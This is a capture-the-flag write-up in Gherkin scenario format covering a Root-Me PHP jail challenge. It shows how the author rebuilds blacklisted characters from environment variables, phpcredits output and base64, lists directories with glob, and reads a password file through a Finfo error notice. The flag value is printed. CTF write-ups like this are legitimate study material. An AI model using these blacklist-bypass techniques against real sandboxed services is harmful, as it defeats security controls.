## Version 2.0
## language: en

Feature: phpjail-appscripting-rootme
  Code:
    phpjail
  Site:
    root-me
  Category:
    app scripting
  User:
    danmur
  Goal:
    Get the user password from sandbox environment

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Opera           | 60.0.3255.170 |
    | Windows OS      | 10            |

  Machine information:
    Given I am accessing through a WebSSH
    And enter a console that allows me to execute php
    And PHP version 5.5.9
    And is running on Ubuntu 4.29
    And that flag is on a subdirectory

  Scenario: Fail:classic-commands
    When I type phpinfo() command
    And see HOME variable
    Then I try to get the subdirectories
    """
    print_r(scandir($_SERVER['PHP_SELF']));
    """
    And I Get
    """
    NOPE!
    """
    Then I decide to try again
    """
    print_r(glob("/challenge/app-script/ch13/*"));
    """
    And I Get
    """
    NOPE!
    """

  Scenario: Fail:getting-available-commands
    Given the restrictions of input commands
    When I test different charsets and words
    Then I create a table of denied or allowed characters
    """
    -----Table A-----
    $ -> denied
    echo -> allowed
    print_r -> allowed
    , -> allowed
    . -> denied
    / -> denied
    ' -> denied
    " -> denied
    * -> allowed
    ( -> allowed
    ) -> allowed
    [ -> allowed
    ] -> allowed
    \ -> allowed
    """
    Then I test predefined functions
    """
    -----Table B-----
    call_user_func -> denied
    file_get_contents -> denied
    fread -> denied
    popen -> denied
    highlight_file -> denied
    highlight_source -> denied
    highlight -> denied
    file -> denied
    scandir -> denied
    dir -> denied
    glob -> allowed
    """

  Scenario: Fail:getting-charsets-from-env-vars
    Given restrictions exposed on tables A and B
    When I try with
    """
    char -> denied
    define -> allowed
    getenv -> allowed
    """
    Then I realise that some env-vars has denied chars
    Then I test if they are denied
    """
    SHELL -> allowed
    HOME -> allowed
    """
    Then I can obtain chars with
    """
    getenv(HOME)[#]
    """

  Scenario: Fail:finding-other-char-generation-method
    Given char "/" from HOME
    Given char "-" from HOME
    Given char "." from SHELL
    Then I realise that char "*" is missing
    Then I try some function that returns input
    """
    md5 -> denied
    hash -> denied
    base64_decode ->allowed
    """

  Scenario: Fail:getting-equal-char
    Given base64 allowed
    Then I try to output "*" by decoding "Kg=="
    When I see that char "=" is missing
    Then I search the char on functions
    And found phpcredits()
    Then I extract it as follows
    """
    ob_start();
    phpcredits(CREDITS_MODULES);
    define(xd,ob_get_clean());
    define(equal,str_split(xd)[4175]);
    """

  Scenario: Fail:building-with-base64
    Given char "="
    Then I create other characters
    """
    define(slash,getenv(HOME)[0]);
    define(raya,base64_decode(implode([L,Q,equal,equal])));
    define(asterisk,base64_decode(implode([K,g,equal,equal])));
    """

  Scenario: Fail:getting-subdirectories
    Given slash
    And raya
    And asterisk
    When I use implode to create the path
    And glob for finding subdirectories
    """
    define(hpath,implode([slash,challenge,slash,
        implode(raya,[app,script]),slash,ch13]));
    print_r(glob(implode([hpath,slash,asterisk])));
    """
    Then I get
    """
    Array
    (
        [0] => /challenge/app-script/ch13/ch13.php
        [1] => /challenge/app-script/ch13/passwd
    )
    """

  Scenario: Fail:opening-file
    Given the path of the password
    And restrictions list on table B
    Then I search for allowed open functions
    And for allowed read functions
    """
    open -> allowed
    read -> denied
    fread -> denied
    fgetc -> allowed
    fopen -> denied
    gzopen -> denied
    bzopen -> denied
    fsockopen -> allowed
    """
    Then only a open function is missing
    Then trying other functions
    """
    define(passpath,implode([hpath,slash,passwd]));
    print_r(stream_get_transports());
    if(is_resource(fsockopen(passpath,443) ) ){
      print_r(siii);
    }else{
      print_r(nada);
    }
    """
    Then I get "nada"
    Then try another
    """
    zip_open -> allowed
    rar_open -> allowed
    rar_open(passpath);
    zip_open(passpath);
    """
    Then I receive nothing
    Then I try Phar
    """
    define(point,getenv(SHELL)[31]);
    rename(hpath,implode([hpath,point,phar]));
    """
    Then I see no change on file name
    Then using Phar fails

  Scenario: Success:error-handling
    Given open functions unsuccessful
    Then errors are handled
    """
    print_r(error_get_last());
    """
    Then past functions are revaluated
    When I found that Finfo tries to open file
    And return its content on warning
    Then I try to get the warnings
    """
    error_reporting(E_NOTICE);
    new Finfo(0,glob(implode([hpath,slash,asterisk]))[1]);
    """
    Then I get
    """
    PHP Notice:  finfo::finfo():
    Warning: offset `G00dJ0b!Th1sI5th3phpAYfl4g' invalid in
    /challenge/app-script/ch13/ch13.php(36) : eval()'d
    code on line 1
    """
    Then I validate the offset as the password
    And solve the challenge
